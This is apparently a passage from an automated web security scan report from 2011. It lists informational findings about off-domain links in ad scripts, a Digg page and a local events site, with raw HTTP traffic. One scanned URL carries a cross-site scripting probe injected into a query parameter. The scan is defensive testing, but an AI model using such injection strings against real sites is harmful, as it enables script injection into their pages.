Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365; FFpb=1220:4f791'$951:spectrum300x250,ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=4:2:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213#562813|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2:0,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:3:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213#562813#711378|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 21:57:44 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=236
Expires: Fri, 28 Jan 2011 22:01:40 GMT
Date: Fri, 28 Jan 2011 21:57:44 GMT
Connection: close
Content-Length: 2273

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='audiencescie
...[SNIP]...
</span>")
document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/cm.rev_bostonherald/;sz=300x250;ord=' + Math.random() + '?" type="text/javascript"><\/script>
...[SNIP]...

17.182. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fmr.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js?c=7/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.05526216677390039

The response contains the following link to another domain:

http://redcated/APM/iview/267856421/direct;wi.728;hi.90/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=

Request

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,14:951,7,14;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196644:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Sat, 29 Jan 2011 13:40:40 GMT
Date: Sat, 29 Jan 2011 13:39:46 GMT
Connection: close
Content-Length: 4378

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856421/direct;wi.728;hi.90/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.183. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fmr.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.4859021785669029

The response contains the following link to another domain:

http://redcated/APM/iview/267856420/direct;wi.300;hi.250/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.4859021785669029 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883604Zc826000187,826000187Zs173Zt128; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,7,9;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196646,196644:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,27,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Sat, 29 Jan 2011 13:40:40 GMT
Date: Sat, 29 Jan 2011 13:39:46 GMT
Connection: close
Content-Length: 4388

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856420/direct;wi.300;hi.250/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.184. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page was loaded from a URL containing a query string:

http://digg.com/submit?phase=2&url=http://www.bostonherald.com

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=2&c2=6299437&c3=&c4=&c5=&c6=&c15=&cj=1
http://cdn1.diggstatic.com/css/library/global.5b83bc1a.css
http://cdn1.diggstatic.com/img/favicon.a015f25c.ico
http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js
http://cdn2.diggstatic.com/css/App_Submission/index.c3c738bb.css
http://cdn2.diggstatic.com/js/lib.b29284a6.js
http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js
http://www.surveymonkey.com/s/ZNBQMYJ

Request

GET /submit?phase=2&url=http://www.bostonherald.com HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:29 GMT; path=/; domain=digg.com
Set-Cookie: d=77e17940db831f181383a5bb3cb5c736d63ecf04d0fe3deac9bb624c4d81a73d; expires=Thu, 28-Jan-2021 15:33:09 GMT; path=/; domain=.digg.com
X-Digg-Time: D=37770 10.2.128.190
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7660

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<meta name="description" content="The best news, videos and pictures on the web as voted on by the Digg community. Breaking news on Technology, Politics, Entertainment, and more!">

<link rel="shortcut icon" href="http://cdn1.diggstatic.com/img/favicon.a015f25c.ico">

<link rel="stylesheet" type="text/css" href="http://cdn1.diggstatic.com/css/library/global.5b83bc1a.css" media="all">


<link rel="stylesheet" type="text/css" href="http://cdn2.diggstatic.com/css/App_Submission/index.c3c738bb.css" media="all">

<script type='text/javascript'>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.surveymonkey.com/s/ZNBQMYJ" id="feedback-bar-survey">Take the survey</a>
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/lib.b29284a6.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6299437&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

17.185. http://events.cbs6albany.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1

The response contains the following links to other domains:

http://ads.bluelithium.com/pixel?id=883607&t=2
http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/images/ico_add.gif?65617
http://js.zvents.com/images/icons/ico_tix.gif?65617
http://js.zvents.com/images/icons/orange_ff.gif?65617
http://js.zvents.com/images/icons/orange_pause.gif?65617
http://js.zvents.com/images/icons/orange_play.gif?65617
http://js.zvents.com/images/icons/orange_rev.gif?65617
http://js.zvents.com/images/reminder_icon.gif?65617
http://js.zvents.com/javascripts/happy_default.js?65617
http://js.zvents.com/stylesheets/happy_default.css?65617
http://js.zvents.com/stylesheets/happy_mv_views_pack.css?65617
http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C
http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif
http://www.freedom.com/eula.html
http://www.freedom.com/privacy.html
http://www.omniture.com/
http://www.zvents.com/albany-ny/events
http://www.zvents.com/images/internal/0/2/0/9/img_459020_primary.jpg?resample_method=
http://www.zvents.com/images/internal/5/0/3/8/img_9628305_thumb.jpg?resample_method=
http://www.zvents.com/images/internal/5/2/3/8/img_8188325_thumb.jpg?resample_method=
http://www.zvents.com/images/internal/5/2/8/3/img_8063825_primary.jpg?resample_method=
http://www.zvents.com/images/internal/5/8/6/4/img_8914685_thumb.jpg?resample_method=
http://www.zvents.com/images/internal/5/8/9/0/img_2640985_thumb.jpg?resample_method=scaled
http://www.zvents.com/images/internal/6/4/1/8/img_868146_thumb.jpg?resample_method=
http://www.zvents.com/images/internal/7/3/2/5/img_155237_primary.jpg?resample_method=scaled
http://www.zvents.com/images/internal/7/6/5/8/img_348567_primary.jpg?resample_method=
http://www.zvents.com/images/internal/8/0/5/4/img_74508_primary.jpg?resample_method=resized
https://r.turn.com/r/beacon?b2=6HlPZst5Lbpa4Q0bnCjk29eeq-vgwHuv9M537E8_UCe8VoKBMY3PiJdxH5h7LTsMIfnjQj5FBgFLdQEkX-S0zA&cid=
https://secure.adnxs.com/seg?add=87103&t=2

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 02:01:35 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 71
ETag: "eed8e5ffca5c38eb679d9e31a9c3a697"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=FEftj6b0hOTE3Zp5_y4l5Q.100055477; path=/; expires=Sun, 29-Jan-2012 02:01:35 GMT
Set-Cookie: zvents_tracker_sid=FEftj6b0hOTE3Zp5_y4l5Q.100055477; path=/; expires=Sun, 29-Jan-2012 02:01:35 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlYjQwZTRhZjhjYmEzYmVmMmU1NDM0NDBlMzcyNmFiOWMiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--4930ba074640b4fd1a6cc5de2e1bcb0c85dac8cd; path=/; expires=Fri, 29-Apr-2011 02:01:35 GMT; HttpOnly
Content-Length: 49204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>

<link href="http://js.zvents.com/stylesheets/happy_default.css?65617" media="screen" rel="stylesheet" type="text/css" />

<link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?65617" media="screen" rel="stylesheet" type="text/css" />

<link href='/partners/css/150.css' media='screen' rel='Stylesheet' type='text/css' />
...[SNIP]...
</script>

<img border="0" src="https://r.turn.com/r/beacon?b2=6HlPZst5Lbpa4Q0bnCjk29eeq-vgwHuv9M537E8_UCe8VoKBMY3PiJdxH5h7LTsMIfnjQj5FBgFLdQEkX-S0zA&cid=">


<img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" />

...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
<a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?65617" /> add to our listings</a>
...[SNIP]...
<a id="rotation_prev" href="#"><img alt="Previous event" src="http://js.zvents.com/images/icons/orange_rev.gif?65617" title="Previous event" /></a>
...[SNIP]...
pt:void(0)" id="featured_rotation_pause" onclick="$ZJQuery('#featured_rotation').cycle('pause'); $ZJQuery('#featured_rotation_play').show(); $ZJQuery('#featured_rotation_pause').hide(); return false;"><img alt="Pause event slideshow" src="http://js.zvents.com/images/icons/orange_pause.gif?65617" title="Pause event slideshow" /></a>
...[SNIP]...
ed_rotation_play" onclick="$ZJQuery('#featured_rotation').cycle('resume'); $ZJQuery('#featured_rotation_play').hide(); $ZJQuery('#featured_rotation_pause').show(); return false;" style="display: none"><img alt="Resume event slideshow" src="http://js.zvents.com/images/icons/orange_play.gif?65617" title="Resume event slideshow" /></a>
<a id="rotation_next" href="#"><img alt="Next event" src="http://js.zvents.com/images/icons/orange_ff.gif?65617" title="Next event" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/139733045-pink-floyd-experience" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:139733045', false, this)"><img alt="Pink Floyd Experience" src="http://www.zvents.com/images/internal/0/2/0/9/img_459020_primary.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/142549185-lisa-lampanelli" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:142549185', false, this)"><img alt="Lisa Lampanelli" src="http://www.zvents.com/images/internal/8/0/5/4/img_74508_primary.jpg?resample_method=resized" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/151637365-riverdance" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:151637365', false, this)"><img alt="Riverdance" src="http://www.zvents.com/images/internal/7/6/5/8/img_348567_primary.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/147270025-glenn-beck" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:147270025', false, this)"><img alt="Glenn Beck" src="http://www.zvents.com/images/internal/5/2/8/3/img_8063825_primary.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/155300665-celtic-woman" class="featured_headline" onclick="return Zvents.tracker.notifyFeaturedClick('event:155300665', false, this)"><img alt="Celtic Woman" src="http://www.zvents.com/images/internal/7/3/2/5/img_155237_primary.jpg?resample_method=scaled" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/154912025-mike-epps-and-friends" onclick="return Zvents.tracker.notifyFeaturedClick('event:154912025', false, this)"><img alt="Mike Epps And Friends" border="0" src="http://www.zvents.com/images/internal/6/4/1/8/img_868146_thumb.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/155222925-keith-urban-get-closer-2011-world-tour" onclick="return Zvents.tracker.notifyFeaturedClick('event:155222925', false, this)"><img alt="Keith Urban - Get Closer 2011 World Tour" border="0" src="http://www.zvents.com/images/internal/5/8/6/4/img_8914685_thumb.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/152086945-harlem-globetrotters" onclick="return Zvents.tracker.notifyFeaturedClick('event:152086945', false, this)"><img alt="Harlem Globetrotters" border="0" src="http://www.zvents.com/images/internal/5/8/9/0/img_2640985_thumb.jpg?resample_method=scaled" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/161020605-an-evening-with-cesar-millan-the-dog-whisperer" onclick="return Zvents.tracker.notifyFeaturedClick('event:161020605', false, this)"><img alt="An Evening With Cesar Millan: The Dog Whisperer" border="0" src="http://www.zvents.com/images/internal/5/0/3/8/img_9628305_thumb.jpg?resample_method=" /></a>
...[SNIP]...
<a href="/albany-ny/events/show/148455425-sesame-street-live-elmos-green-thumb" onclick="return Zvents.tracker.notifyFeaturedClick('event:148455425', false, this)"><img alt="Sesame Street Live "Elmo's Green Thumb"" border="0" src="http://www.zvents.com/images/internal/5/2/3/8/img_8188325_thumb.jpg?resample_method=" /></a>
...[SNIP]...
733045-pink-floyd-experience" alt="Buy Tickets" name="&lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:139733045'
, 1, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ow/142549185-lisa-lampanelli" alt="Buy Tickets" name="&lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:142549185'
, 2, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ts/show/147270025-glenn-beck" alt="Buy Tickets" name="&lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:147270025'
, 3, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
treet-live-elmos-green-thumb" alt="Buy Tickets" name="&lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:148455425'
, 4, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ts/show/151637365-riverdance" alt="Buy Tickets" name="&lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:151637365'
, 5, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
2086945-harlem-globetrotters" alt="Buy Tickets" name="&lid=EventTab_HotTix_EventLink" onclick="return Zvents.tracker.notifyHotTicketsClick('event:152086945'
, 6, false, this);" title="Buy Tickets"><img alt="Ico_tix" src="http://js.zvents.com/images/icons/ico_tix.gif?65617" /></a>
...[SNIP]...
ss="sc-reminder" href="javascript:void(0)" onclick="$ZJQuery('#z_email_reminder_popup').popup({remote:true, url:'/events/email_reminder/162869785'}); return false;" rel="nofollow" title="Set Reminder"><img alt="Reminder_icon" src="http://js.zvents.com/images/reminder_icon.gif?65617" /></a>
...[SNIP]...
ss="sc-reminder" href="javascript:void(0)" onclick="$ZJQuery('#z_email_reminder_popup').popup({remote:true, url:'/events/email_reminder/163938585'}); return false;" rel="nofollow" title="Set Reminder"><img alt="Reminder_icon" src="http://js.zvents.com/images/reminder_icon.gif?65617" /></a>
...[SNIP]...
ss="sc-reminder" href="javascript:void(0)" onclick="$ZJQuery('#z_email_reminder_popup').popup({remote:true, url:'/events/email_reminder/164180885'}); return false;" rel="nofollow" title="Set Reminder"><img alt="Reminder_icon" src="http://js.zvents.com/images/reminder_icon.gif?65617" /></a>
...[SNIP]...
</a> | <a href="http://www.freedom.com/privacy.html" onclick="window.open('http://www.freedom.com/privacy.html');return false" class="fLinks">Privacy</a> | <a href="http://www.freedom.com/eula.html" onclick="window.open('http://www.freedom.com/eula.html');return false" class="fLinks">User Agreement</a>
...[SNIP]...
<div id="zpwrdby">
<a href="http://www.zvents.com/albany-ny/events"><img src="/images/zPB.gif" alt="Zvents - Discover things to do" border="0" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>


<img src="http://ads.bluelithium.com/pixel?id=883607&t=2" width="1" height="1" />
<script type="text/javascript" charset="utf-8">
...[SNIP]...

17.186. http://events.cbs6albany.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1

The response contains the following links to other domains:

